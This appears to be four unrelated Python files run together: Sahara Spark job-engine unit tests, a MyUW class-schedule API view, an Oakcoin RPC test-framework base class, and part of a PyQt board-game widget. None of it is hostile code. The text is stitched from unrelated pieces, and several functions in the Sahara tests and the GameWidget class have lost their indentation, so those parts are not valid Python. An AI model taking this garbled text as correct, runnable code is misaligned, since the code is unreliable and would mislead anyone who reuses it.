        * retrieves the remote instance
        * executes the proper kill command
        * does not retrieve the job status (because the remote command failed)
        '''
        # This is to mock "with remote.get_remote(instance) as r"
        # and to mock r.execute_command to return failure (exit code -1)
        remote_instance = mock.Mock()
        get_remote.return_value.__enter__ = mock.Mock(
            return_value=remote_instance)
        remote_instance.execute_command.return_value = (-1, "some error")
        eng = se.SparkJobEngine("cluster")
        job_exec = mock.Mock()
        status = eng.cancel_job(job_exec)
        # check that remote.get_remote was called with the result of
        # eng._get_instance_if_running
        get_remote.assert_called_with("instance")
        # check that execute_command was called with the proper arguments
        # ("pid" was passed in)
        remote_instance.execute_command.assert_called_with(
            "kill -SIGINT pid",
            raise_when_error=False)
        # check that the job status was not retrieved since the command failed
        self.assertEqual(0, _get_job_status_from_remote.called)
        # check that we have nothing new to report ...
        self.assertIsNone(status)
@mock.patch('sahara.service.edp.binary_retrievers.dispatch.get_raw_binary')
@mock.patch('sahara.utils.remote.get_remote')
def test_upload_job_files(self, get_remote, get_raw_binary):
main_names = ["main1", "main2", "main3"]
lib_names = ["lib1", "lib2", "lib3"]
def make_data_objects(*args):
objs = []
for name in args:
m = mock.Mock()
m.name = name
objs.append(m)
return objs
job = mock.Mock()
job.name = "job"
job.mains = make_data_objects(*main_names)
job.libs = make_data_objects(*lib_names)
# This is to mock "with remote.get_remote(instance) as r"
remote_instance = mock.Mock()
get_remote.return_value.__enter__ = mock.Mock(
return_value=remote_instance)
get_raw_binary.return_value = "data"
eng = se.SparkJobEngine("cluster")
paths, builtins = eng._upload_job_files("where", "/somedir", job, {})
self.assertEqual(["/somedir/" + n for n in main_names + lib_names],
paths)
for path in paths:
remote_instance.write_file_to.assert_any_call(path, "data")
def _make_master_instance(self, return_code=0):
master = mock.Mock()
master.execute_command.return_value = (return_code, self.spark_pid)
master.hostname.return_value = self.master_host
master.id = self.master_inst
return master
def _config_values(self, *key):
return {("Spark", "Master port", "cluster"): self.master_port,
("Spark", "Spark home", "cluster"): self.spark_home,
("Spark", "Executor extra classpath",
"cluster"): self.driver_cp}[key]
    @mock.patch('sahara.conductor.API.job_execution_get')
    @mock.patch('sahara.utils.remote.get_remote')
    @mock.patch('sahara.plugins.spark.config_helper.get_config_value')
    @mock.patch('sahara.service.edp.job_utils.create_workflow_dir')
    @mock.patch('sahara.plugins.utils.get_instance')
    @mock.patch('sahara.conductor.API.job_get')
    @mock.patch('sahara.context.ctx', return_value="ctx")
    def _setup_run_job(self, master_instance, job_configs, files,
                       ctx, job_get, get_instance, create_workflow_dir,
                       get_config_value, get_remote, job_exec_get):
        """Common scaffolding for the run_job tests.

        Mocks everything around SparkJobEngine.run_job() and invokes it:
        *master_instance* is the mock Spark master, *job_configs* becomes
        the execution's job_configs, and *files* names the jars (and
        optional 'bltns' builtins) pretended to be in the workflow dir.
        Returns the status tuple produced by run_job().
        """
        def _upload_job_files(where, job_dir, job,
                              libs_subdir=True, job_configs=None):
            # Pretend the job files were uploaded into the workflow dir
            paths = [os.path.join(self.workflow_dir, f) for f in files['jars']]
            bltns = files.get('bltns', [])
            bltns = [os.path.join(self.workflow_dir, f) for f in bltns]
            return paths, bltns
        job = mock.Mock()
        job.name = "MyJob"
        job_get.return_value = job
        job_exec = mock.Mock()
        job_exec.job_configs = job_configs
        get_config_value.side_effect = self._config_values
        create_workflow_dir.return_value = self.workflow_dir
        # This is to mock "with remote.get_remote(master) as r" in run_job
        get_remote.return_value.__enter__ = mock.Mock(
            return_value=master_instance)
        get_instance.return_value = master_instance
        eng = se.SparkJobEngine("cluster")
        eng._upload_job_files = mock.Mock()
        eng._upload_job_files.side_effect = _upload_job_files
        status = eng.run_job(job_exec)
        # Check that we launch on the master node
        get_instance.assert_called_with("cluster", self.master_host)
        return status
    def test_run_job_raise(self):
        """run_job() must raise EDPError when the spark-submit command
        exits non-zero on the master."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass"},
            'args': ['input_arg', 'output_arg']
        }
        files = {'jars': ["app.jar",
                          "jar1.jar",
                          "jar2.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance(return_code=1)
        # If execute_command returns an error we should get a raise
        self.assertRaises(ex.EDPError,
                          self._setup_run_job,
                          master_instance, job_configs, files)
    def test_run_job_extra_jars_args(self):
        """run_job() with extra jars and args: expect a --jars option and
        the args appended after the application jar."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass"},
            'args': ['input_arg', 'output_arg']
        }
        files = {'jars': ["app.jar",
                          "jar1.jar",
                          "jar2.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance()
        status = self._setup_run_job(master_instance, job_configs, files)
        # Check the command
        master_instance.execute_command.assert_called_with(
            'cd %(workflow_dir)s; '
            './launch_command %(spark_home)s/bin/spark-submit '
            '--class org.me.myclass --jars jar1.jar,jar2.jar '
            '--master spark://%(master_host)s:%(master_port)s '
            'app.jar input_arg output_arg '
            '> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
                                            "spark_home": self.spark_home,
                                            "master_host": self.master_host,
                                            "master_port": self.master_port})
        # Check result here
        self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
                          edp.JOB_STATUS_RUNNING,
                          {"spark-path": self.workflow_dir}), status)
    def test_run_job_args(self):
        """run_job() with a single jar and args: no --jars option, args
        appended after the application jar."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass"},
            'args': ['input_arg', 'output_arg']
        }
        files = {'jars': ["app.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance()
        status = self._setup_run_job(master_instance, job_configs, files)
        # Check the command
        master_instance.execute_command.assert_called_with(
            'cd %(workflow_dir)s; '
            './launch_command %(spark_home)s/bin/spark-submit '
            '--class org.me.myclass '
            '--master spark://%(master_host)s:%(master_port)s '
            'app.jar input_arg output_arg '
            '> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
                                            "spark_home": self.spark_home,
                                            "master_host": self.master_host,
                                            "master_port": self.master_port})
        # Check result here
        self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
                          edp.JOB_STATUS_RUNNING,
                          {"spark-path": self.workflow_dir}), status)
    def test_run_job(self):
        """run_job() with a single jar and no args: minimal spark-submit
        command line."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass"},
        }
        files = {'jars': ["app.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance()
        status = self._setup_run_job(master_instance, job_configs, files)
        # Check the command
        master_instance.execute_command.assert_called_with(
            'cd %(workflow_dir)s; '
            './launch_command %(spark_home)s/bin/spark-submit '
            '--class org.me.myclass '
            '--master spark://%(master_host)s:%(master_port)s '
            'app.jar '
            '> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
                                            "spark_home": self.spark_home,
                                            "master_host": self.master_host,
                                            "master_port": self.master_port})
        # Check result here
        self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
                          edp.JOB_STATUS_RUNNING,
                          {"spark-path": self.workflow_dir}), status)
    def test_run_job_wrapper_extra_jars_args(self):
        """run_job() with the swift wrapper, extra jars and args: the
        SparkWrapper class is launched with the user's class, jar and args
        relayed via the wrapper.jar command line."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass",
                        "edp.spark.adapt_for_swift": True},
            'args': ['input_arg', 'output_arg']
        }
        files = {'jars': ["app.jar",
                          "jar1.jar",
                          "jar2.jar"],
                 'bltns': ["wrapper.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance()
        status = self._setup_run_job(master_instance, job_configs, files)
        # Check the command
        master_instance.execute_command.assert_called_with(
            'cd %(workflow_dir)s; '
            './launch_command %(spark_home)s/bin/spark-submit '
            '--driver-class-path %(driver_cp)s '
            '--class org.openstack.sahara.edp.SparkWrapper '
            '--jars app.jar,jar1.jar,jar2.jar '
            '--master spark://%(master_host)s:%(master_port)s '
            'wrapper.jar spark.xml org.me.myclass input_arg output_arg '
            '> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
                                            "spark_home": self.spark_home,
                                            "driver_cp": self.driver_cp,
                                            "master_host": self.master_host,
                                            "master_port": self.master_port})
        # Check result here
        self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
                          edp.JOB_STATUS_RUNNING,
                          {"spark-path": self.workflow_dir}), status)
    def test_run_job_wrapper_args(self):
        """run_job() with the swift wrapper and args: single user jar goes
        in --jars, args are relayed via the wrapper.jar command line."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass",
                        "edp.spark.adapt_for_swift": True},
            'args': ['input_arg', 'output_arg']
        }
        files = {'jars': ["app.jar"],
                 'bltns': ["wrapper.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance()
        status = self._setup_run_job(master_instance, job_configs, files)
        # Check the command
        master_instance.execute_command.assert_called_with(
            'cd %(workflow_dir)s; '
            './launch_command %(spark_home)s/bin/spark-submit '
            '--driver-class-path %(driver_cp)s '
            '--class org.openstack.sahara.edp.SparkWrapper '
            '--jars app.jar '
            '--master spark://%(master_host)s:%(master_port)s '
            'wrapper.jar spark.xml org.me.myclass input_arg output_arg '
            '> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
                                            "spark_home": self.spark_home,
                                            "driver_cp": self.driver_cp,
                                            "master_host": self.master_host,
                                            "master_port": self.master_port})
        # Check result here
        self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
                          edp.JOB_STATUS_RUNNING,
                          {"spark-path": self.workflow_dir}), status)
    def test_run_job_wrapper(self):
        """run_job() with the swift wrapper and no args: minimal wrapped
        spark-submit command line."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass",
                        "edp.spark.adapt_for_swift": True}
        }
        files = {'jars': ["app.jar"],
                 'bltns': ["wrapper.jar"]}
        # The object representing the spark master node
        # The spark-submit command will be run on this instance
        master_instance = self._make_master_instance()
        status = self._setup_run_job(master_instance, job_configs, files)
        # Check the command
        master_instance.execute_command.assert_called_with(
            'cd %(workflow_dir)s; '
            './launch_command %(spark_home)s/bin/spark-submit '
            '--driver-class-path %(driver_cp)s '
            '--class org.openstack.sahara.edp.SparkWrapper '
            '--jars app.jar '
            '--master spark://%(master_host)s:%(master_port)s '
            'wrapper.jar spark.xml org.me.myclass '
            '> /dev/null 2>&1 & echo $!' % {"workflow_dir": self.workflow_dir,
                                            "spark_home": self.spark_home,
                                            "driver_cp": self.driver_cp,
                                            "master_host": self.master_host,
                                            "master_port": self.master_port})
        # Check result here
        self.assertEqual(("%s@%s" % (self.spark_pid, self.master_inst),
                          edp.JOB_STATUS_RUNNING,
                          {"spark-path": self.workflow_dir}), status)
    @mock.patch('sahara.service.edp.hdfs_helper.configure_cluster_for_hdfs')
    @mock.patch('sahara.service.edp.job_utils.resolve_data_source_references')
    def test_external_hdfs_config(self, resolver, configurer):
        """When the job references an hdfs data source, run_job() must
        configure the cluster for external HDFS access."""
        job_configs = {
            'configs': {"edp.java.main_class": "org.me.myclass"},
        }
        files = {'jars': ["app.jar"]}
        data_source = mock.Mock()
        data_source.type = 'hdfs'
        resolver.return_value = ([data_source], job_configs)
        master_instance = self._make_master_instance()
        self._setup_run_job(master_instance, job_configs, files)
        configurer.assert_called_with("cluster", data_source)
| |
# Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
import logging
import traceback
from operator import itemgetter
from restclients_core.exceptions import InvalidNetID
from myuw.dao.campus_building import get_building_by_code
from myuw.dao.canvas import (
get_canvas_active_enrollments, set_section_canvas_course_urls)
from myuw.dao.enrollment import get_enrollment_for_term, is_ended
from myuw.dao.library import get_subject_guide_by_section
from myuw.dao.pws import get_person_of_current_user
from myuw.dao.registration import get_schedule_by_term
# from myuw.dao.schedule import filter_schedule_sections_by_summer_term
# from myuw.dao.registered_term import get_current_summer_term_in_schedule
from myuw.logger.timer import Timer
from myuw.logger.logresp import (
log_data_not_found_response, log_api_call, log_exception)
from myuw.views.api import ProtectedAPI
from myuw.views.error import data_not_found, unknown_uwnetid, handle_exception
from myuw.views import prefetch_resources
logger = logging.getLogger(__name__)
class StudClasSche(ProtectedAPI):
    """
    API view returning the current user's class schedule for a term
    as JSON.
    """

    def dispatch(self, request, *args, **kwargs):
        timer = Timer()
        try:
            # Raises InvalidNetID for sessions without a valid identity;
            # the person object itself is not needed here.
            get_person_of_current_user(request)
        except InvalidNetID:
            return unknown_uwnetid()
        try:
            prefetch_resources(request,
                               prefetch_enrollment=True,
                               prefetch_library=True,
                               prefetch_canvas=True)
            return super(StudClasSche, self).dispatch(request, *args, **kwargs)
        except Exception:
            # BUG FIX: the error response must be returned; previously the
            # view fell through and returned None on failure.
            return handle_exception(logger, timer, traceback)

    def make_http_resp(self, timer, term, request, summer_term=None):
        """
        @return class schedule data in json format
        status 404: no schedule found (not registered)
        """
        schedule = get_schedule_by_term(
            request, term=term, summer_term=summer_term)
        if len(schedule.sections) == 0:
            log_data_not_found_response(logger, timer)
            return data_not_found()
        resp_data = load_schedule(request, schedule)
        log_api_call(timer, request,
                     "Get Student Schedule {},{}".format(term.year,
                                                         term.quarter))
        return self.json_response(resp_data)
def load_schedule(request, schedule):
    """Convert a schedule object into the JSON payload for the schedule API.

    Adds per-section display attributes (color, course slug, early fall
    start / irregular date flags, standby status, Canvas and library
    links), backfills building geo data on meetings, hides unpublished
    instructor contact info, and sorts sections and PCE meetings.
    """
    json_data = schedule.json_data()
    if schedule.term.is_summer_quarter():
        json_data["summer_term"] = schedule.summer_term
    if len(schedule.sections):
        try:
            # attach each section's Canvas course url, best effort
            set_section_canvas_course_urls(
                get_canvas_active_enrollments(request), schedule, request)
        except Exception:
            log_exception(logger, 'get_canvas_active_enrollments', traceback)
            pass
    section_index = 0
    json_data["has_eos_dates"] = False
    for section in schedule.sections:
        # json_data["sections"] is positionally parallel to schedule.sections
        section_data = json_data["sections"][section_index]
        section_index += 1
        section_data["color_id"] = section.color_id
        section_data['course_abbr_slug'] = section.curriculum_abbr.replace(
            " ", "-")
        if not section_data["section_type"]:
            if len(section.meetings) > 0:
                section_data["section_type"] = section.meetings[0].meeting_type
        if section.is_early_fall_start():
            section_data["cc_display_dates"] = True
            section_data["early_fall_start"] = True
            json_data["has_early_fall_start"] = True
            section_data["is_ended"] = is_ended(request, section.end_date)
        else:
            # non-EFS sections only show dates when they deviate from the
            # standard term dates
            if irregular_start_end(schedule.term, section):
                section_data["cc_display_dates"] = True
                section_data["is_ended"] = is_ended(request, section.end_date)
        section_data["on_standby"] = (
            section.registration.is_standby_status())
        try:
            section_data["canvas_url"] = section.canvas_course_url
        except Exception:
            # section may have no canvas_course_url attribute
            pass
        # if section.is_primary_section:
        if section.sln:
            try:
                section_data["lib_subj_guide"] =\
                    get_subject_guide_by_section(section)
            except Exception:
                log_exception(logger,
                              'get_subject_guide_by_section', traceback)
                pass
        if section.final_exam:
            final = section_data["final_exam"]
            # MUWM-4728
            final["is_remote"] = section.is_remote
            # MUWM-596 we don't display
            # if section.final_exam.building:
            #     building = get_building_by_code(section.final_exam.building)
            #     if building:
            #         final["longitude"] = building.longitude
            #         final["latitude"] = building.latitude
            #         final["building_name"] = building.name
        # Also backfill the meeting building data
        section_data["has_eos_dates"] = False
        meeting_index = 0
        for meeting in section.meetings:
            mdata = section_data["meetings"][meeting_index]
            # MUWM-4728
            mdata["is_remote"] = section.is_remote
            if meeting.eos_start_date is not None:
                if not section_data["has_eos_dates"]:
                    section_data["has_eos_dates"] = True
                mdata["start_end_same"] = False
                if mdata["eos_start_date"] == mdata["eos_end_date"]:
                    mdata["start_end_same"] = True
            try:
                if not mdata["building_tbd"] and len(mdata["building"]):
                    building = get_building_by_code(mdata["building"])
                    if building is not None:
                        mdata["latitude"] = building.latitude
                        mdata["longitude"] = building.longitude
                        mdata["building_name"] = building.name
                # hide instructors who have published no contact info
                for instructor in mdata["instructors"]:
                    if (len(instructor["email_addresses"]) == 0 and
                            len(instructor["phones"]) == 0 and
                            len(instructor["voice_mails"]) == 0 and
                            len(instructor["faxes"]) == 0 and
                            len(instructor["touch_dials"]) == 0 and
                            len(instructor["addresses"]) == 0):
                        instructor["whitepages_publish"] = False
                meeting_index += 1
            except IndexError as ex:
                # NOTE(review): an IndexError aborts the backfill for the
                # remaining meetings of this section (meeting_index is not
                # advanced) -- confirm this is intended
                pass
        if section_data["has_eos_dates"]:
            if not json_data["has_eos_dates"]:
                json_data["has_eos_dates"] = True
            section_data["meetings"] = sort_pce_section_meetings(
                section_data["meetings"])
    # MUWM-443
    json_data["sections"] = sorted(json_data["sections"],
                                   key=itemgetter('curriculum_abbr',
                                                  'course_number',
                                                  'section_id',
                                                  ))
    # add section index
    index = 0
    for section in json_data["sections"]:
        section["index"] = index
        index = index + 1
    return json_data
def irregular_start_end(term, section):
    """Return True when the section's start/end dates deviate from the
    standard dates for its (sub-)term; False when either date is unknown.
    """
    start, end = section.start_date, section.end_date
    if start is None or end is None:
        return False
    if section.is_summer_a_term():
        expected = (term.first_day_quarter, term.aterm_last_date)
    elif section.is_summer_b_term():
        expected = (term.bterm_first_date, term.last_day_instruction)
    else:
        # MUWM-4863: regular sections run through the last final exam date
        expected = (term.first_day_quarter, term.last_final_exam_date)
    return (start, end) != expected
def sort_pce_section_meetings(section_meetings_json_data):
    """
    Sort meeting json data by eos_start_date and stamp each meeting
    with its resulting positional "index".
    """
    ret_list = sorted(section_meetings_json_data,
                      key=itemgetter('eos_start_date'))
    # add the meeting (not section) index after sorting
    for index, meeting in enumerate(ret_list):
        meeting["index"] = index
    return ret_list
| |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Oakcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Base class for RPC testing."""
from collections import deque
import logging
import optparse
import os
import shutil
import sys
import tempfile
import time
import traceback

from .authproxy import JSONRPCException
from .util import (
    initialize_chain,
    start_nodes,
    connect_nodes_bi,
    disconnect_nodes,
    sync_blocks,
    sync_mempools,
    stop_nodes,
    stop_node,
    enable_coverage,
    check_json_precision,
    initialize_chain_clean,
    PortSeed,
)
class OakcoinTestFramework(object):
    """Base class for oakcoind RPC tests.

    Subclasses must override run_test() and may override setup_chain(),
    setup_network() and add_options(); the runner entry point is main().
    """

    # process exit codes understood by the test runner
    TEST_EXIT_PASSED = 0
    TEST_EXIT_FAILED = 1
    TEST_EXIT_SKIPPED = 77

    def __init__(self):
        self.num_nodes = 4
        self.setup_clean_chain = False
        self.nodes = None

    def run_test(self):
        """The actual test logic; must be provided by the subclass."""
        raise NotImplementedError

    def add_options(self, parser):
        """Hook for subclasses to register extra command-line options."""
        pass

    def setup_chain(self):
        """Create the per-node datadirs, cached or from a clean chain."""
        self.log.info("Initializing test directory "+self.options.tmpdir)
        if self.setup_clean_chain:
            initialize_chain_clean(self.options.tmpdir, self.num_nodes)
        else:
            initialize_chain(self.options.tmpdir, self.num_nodes, self.options.cachedir)

    def stop_node(self, num_node):
        """Stop a single node by index."""
        stop_node(self.nodes[num_node], num_node)

    def setup_nodes(self):
        """Start self.num_nodes oakcoinds, honoring self.extra_args if the
        subclass defined it."""
        extra_args = None
        if hasattr(self, "extra_args"):
            extra_args = self.extra_args
        self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, extra_args)

    def setup_network(self):
        self.setup_nodes()
        # Connect the nodes as a "chain". This allows us
        # to split the network between nodes 1 and 2 to get
        # two halves that can work on competing chains.
        for i in range(self.num_nodes - 1):
            connect_nodes_bi(self.nodes, i, i + 1)
        self.sync_all()

    def split_network(self):
        """
        Split the network of four nodes into nodes 0/1 and 2/3.
        """
        disconnect_nodes(self.nodes[1], 2)
        disconnect_nodes(self.nodes[2], 1)
        self.sync_all([self.nodes[:2], self.nodes[2:]])

    def sync_all(self, node_groups=None):
        """Sync blocks then mempools within each group of nodes
        (default: all nodes as one group)."""
        if not node_groups:
            node_groups = [self.nodes]
        [sync_blocks(group) for group in node_groups]
        [sync_mempools(group) for group in node_groups]

    def join_network(self):
        """
        Join the (previously split) network halves together.
        """
        connect_nodes_bi(self.nodes, 1, 2)
        self.sync_all()

    def main(self):
        """Parse options, run the test, then shut nodes down, report the
        outcome and clean up the datadirs."""
        parser = optparse.OptionParser(usage="%prog [options]")
        parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
                          help="Leave oakcoinds and test.* datadir on exit or error")
        parser.add_option("--noshutdown", dest="noshutdown", default=False, action="store_true",
                          help="Don't stop oakcoinds after the test execution")
        parser.add_option("--srcdir", dest="srcdir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__))+"/../../../src"),
                          help="Source directory containing oakcoind/oakcoin-cli (default: %default)")
        parser.add_option("--cachedir", dest="cachedir", default=os.path.normpath(os.path.dirname(os.path.realpath(__file__))+"/../../cache"),
                          help="Directory for caching pregenerated datadirs")
        parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
                          help="Root directory for datadirs")
        parser.add_option("-l", "--loglevel", dest="loglevel", default="INFO",
                          help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console. Note that logs at all levels are always written to the test_framework.log file in the temporary test directory.")
        parser.add_option("--tracerpc", dest="trace_rpc", default=False, action="store_true",
                          help="Print out all RPC calls as they are made")
        parser.add_option("--portseed", dest="port_seed", default=os.getpid(), type='int',
                          help="The seed to use for assigning port numbers (default: current process id)")
        parser.add_option("--coveragedir", dest="coveragedir",
                          help="Write tested RPC commands into this directory")
        parser.add_option("--configfile", dest="configfile",
                          help="Location of the test framework config file")
        self.add_options(parser)
        (self.options, self.args) = parser.parse_args()
        # backup dir variable for removal at cleanup
        self.options.root, self.options.tmpdir = self.options.tmpdir, self.options.tmpdir + '/' + str(self.options.port_seed)
        if self.options.coveragedir:
            enable_coverage(self.options.coveragedir)
        PortSeed.n = self.options.port_seed
        os.environ['PATH'] = self.options.srcdir+":"+self.options.srcdir+"/qt:"+os.environ['PATH']
        check_json_precision()
        # Set up temp directory and start logging
        os.makedirs(self.options.tmpdir, exist_ok=False)
        self._start_logging()
        success = False
        try:
            self.setup_chain()
            self.setup_network()
            self.run_test()
            success = True
        except JSONRPCException as e:
            self.log.exception("JSONRPC error")
        except AssertionError as e:
            self.log.exception("Assertion failed")
        except KeyError as e:
            self.log.exception("Key error")
        except Exception as e:
            self.log.exception("Unexpected exception caught during testing")
        except KeyboardInterrupt as e:
            self.log.warning("Exiting after keyboard interrupt")
        if not self.options.noshutdown:
            self.log.info("Stopping nodes")
            stop_nodes(self.nodes)
        else:
            self.log.info("Note: oakcoinds were not stopped and may still be running")
        if not self.options.nocleanup and not self.options.noshutdown and success:
            self.log.info("Cleaning up")
            shutil.rmtree(self.options.tmpdir)
            if not os.listdir(self.options.root):
                os.rmdir(self.options.root)
        else:
            self.log.warning("Not cleaning up dir %s" % self.options.tmpdir)
            if os.getenv("PYTHON_DEBUG", ""):
                # Dump the end of the debug logs, to aid in debugging rare
                # travis failures.
                import glob
                # BUG FIX: traceback was used below without being imported
                # anywhere in this module, causing a NameError on failure
                import traceback
                filenames = [self.options.tmpdir + "/test_framework.log"]
                filenames += glob.glob(self.options.tmpdir + "/node*/regtest/debug.log")
                MAX_LINES_TO_PRINT = 1000
                for fn in filenames:
                    try:
                        with open(fn, 'r') as f:
                            print("From", fn, ":")
                            print("".join(deque(f, MAX_LINES_TO_PRINT)))
                    except OSError:
                        print("Opening file %s failed." % fn)
                        traceback.print_exc()
        if success:
            self.log.info("Tests successful")
            sys.exit(self.TEST_EXIT_PASSED)
        else:
            self.log.error("Test failed. Test logging available at %s/test_framework.log", self.options.tmpdir)
            logging.shutdown()
            sys.exit(self.TEST_EXIT_FAILED)

    def _start_logging(self):
        # Add logger and logging handlers
        self.log = logging.getLogger('TestFramework')
        self.log.setLevel(logging.DEBUG)
        # Create file handler to log all messages
        fh = logging.FileHandler(self.options.tmpdir + '/test_framework.log')
        fh.setLevel(logging.DEBUG)
        # Create console handler to log messages to stderr. By default this logs only error messages, but can be configured with --loglevel.
        ch = logging.StreamHandler(sys.stdout)
        # User can provide log level as a number or string (eg DEBUG). loglevel was caught as a string, so try to convert it to an int
        ll = int(self.options.loglevel) if self.options.loglevel.isdigit() else self.options.loglevel.upper()
        ch.setLevel(ll)
        # Format logs the same as oakcoind's debug.log with microprecision (so log files can be concatenated and sorted)
        formatter = logging.Formatter(fmt = '%(asctime)s.%(msecs)03d000 %(name)s (%(levelname)s): %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
        formatter.converter = time.gmtime
        fh.setFormatter(formatter)
        ch.setFormatter(formatter)
        # add the handlers to the logger
        self.log.addHandler(fh)
        self.log.addHandler(ch)
        if self.options.trace_rpc:
            rpc_logger = logging.getLogger("OakcoinRPC")
            rpc_logger.setLevel(logging.DEBUG)
            rpc_handler = logging.StreamHandler(sys.stdout)
            rpc_handler.setLevel(logging.DEBUG)
            rpc_logger.addHandler(rpc_handler)
class ComparisonTestFramework(OakcoinTestFramework):
    """Test framework for doing p2p comparison testing.

    Sets up some oakcoind binaries:
    * 1 binary: test binary
    * 2 binaries: 1 test binary, 1 ref binary
    * n>2 binaries: 1 test binary, n-1 ref binaries
    """

    def __init__(self):
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 2

    def add_options(self, parser):
        """Register the --testbinary/--refbinary options."""
        parser.add_option("--testbinary", dest="testbinary",
                          default=os.getenv("BITCOIND", "oakcoind"),
                          help="oakcoind binary to test")
        parser.add_option("--refbinary", dest="refbinary",
                          default=os.getenv("BITCOIND", "oakcoind"),
                          help="oakcoind binary to use for reference nodes (if any)")

    def setup_network(self):
        """Start all nodes whitelisting localhost; node 0 runs the test
        binary, every other node runs the reference binary."""
        binaries = [self.options.testbinary]
        binaries += [self.options.refbinary] * (self.num_nodes - 1)
        whitelist_args = [['-whitelist=127.0.0.1']] * self.num_nodes
        self.nodes = start_nodes(
            self.num_nodes, self.options.tmpdir,
            extra_args=whitelist_args,
            binary=binaries)
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from PyQt4.QtGui import QWidget, QVBoxLayout, QHBoxLayout
from PyQt4.QtCore import QObject, SIGNAL
# Custom Widgets
from pyduel_gui.widgets.board_widget import BoardWidget
from pyduel_gui.widgets.dice_widget import DiceWidget
from pyduel_gui.widgets.action_widget import ActionWidget
from pyduel_gui.widgets.log_widget import LogWidget
from pyduel_gui.widgets.squad_tab_widget import SquadTabWidget
from pyduel_gui.widgets.hand_widget import HandWidget
# temporary settings from engine state
from pyduel_engine.content.engine_states import Action
MAX_HAND_SIZE = 10
class GameWidget(QWidget):
"""Instantiates game object, and all widgets, then calls game setup """
    def __init__(self, parent=None):
        """Pull the shared game object from the parent window, build the
        child controls and layout, then run initial game setup."""
        super(GameWidget, self).__init__(parent)
        # NOTE(review): assumes the parent widget exposes a .game attribute
        self.game = self.parent().game
        self.__build_controls()
        self.__build_layout()
        self._setupGame()
#########################################################################
# Game Phase Methods
#########################################################################
    def _setupGame(self):
        """Set up the game model, place the characters on the board,
        then start play."""
        self._log('Initializing Game')
        self.game.setup()
        self._charsPlace()
        self.startGame()
    def startGame(self):
        """Starts the game: refresh the squad displays and enter the
        first move phase."""
        logging.info('Game Start')
        self._squadsUpdate()
        self._movePhaseStart()
    def _movePhaseStart(self):
        """Toggles move phase in game and shows the active player's hand."""
        self._log("{0} Move phase start".format(self.game.print_status()))
        # TODO: Probably doesn't belong here
        self._handsUpdate()
        self.game.move_phase_start()
        self._movePhaseSet()
    def _movePhaseEnd(self):
        """Called when the active player has no more moves left.

        Lock down the active squad, toggle move phase to false and lock
        the skip move button, then start the action phase.
        """
        self._log("{0} Move phase end".format(self.game.print_status()))
        # update game
        self.game.move_phase_end()
        # drop any leftover selection state before switching phases
        self._resetTempComponents()
        self._actionPhaseStart()
    def _actionPhaseStart(self):
        """Starts the action phase for the active squad."""
        self._log("{0} Action phase start".format(self.game.print_status()))
        # update game
        self.game.action_phase_start()
        if self.game.active_squad().has_action():
            if self.game.active_squad().has_hand():
                self._actionPhaseSet()
            else:
                # an action is available but no cards to play it with
                self._actionPhaseEnd()
        # NOTE(review): when the squad has no action at all, neither branch
        # runs and the phase is never advanced -- confirm this is intended
    def _actionPhaseEnd(self):
        """Ends the action phase: lock the active squad and end the turn."""
        self._log("{0} Action Phase end".format(self.game.print_status()))
        # update game
        self.game.action_phase_end()
        self._lockActiveSquad()
        self._turnEnd()
def _turnEnd(self):
"""Ends the turn incrementing what turn it is unless its the last turn
in which we reset back to the first player and call for the new round
"""
self._log("{0} Turn End".format(self.game.print_status()))
if self.game.turn == self.game.num_squads() - 1:
self._roundEnd()
else:
self.game.increment_turn()
self.squads.setCurrentIndex(self.game.turn)
self._movePhaseStart()
def _roundEnd(self):
"""End of round """
self._log("{0} Round End".format(self.game.print_status()))
self.game.increment_round()
self._movePhaseStart()
###########################################################################
# Game and Gui modifiers
###########################################################################
def _movePhaseSquareSelection(self, pos):
"""Move Phase Square selection.
- if active char is not set. Set new active character at pos or,
if active char pos is the input pos, move the character.
- clean up the board if deselecting or moving """
# TODO: Either lock down active squad or make condition for
# switching active characters
# select active character and targets
if self.game.active_char is None:
self._activeCharSelect(pos)
else:
# gui cleanup
self._possibleTargetsDeactivate()
self._squareDeselect(pos)
# move
if self.game.active_char.pos != pos:
self._charMove(self.game.active_char, pos)
# deselect active char
self._resetTempComponents()
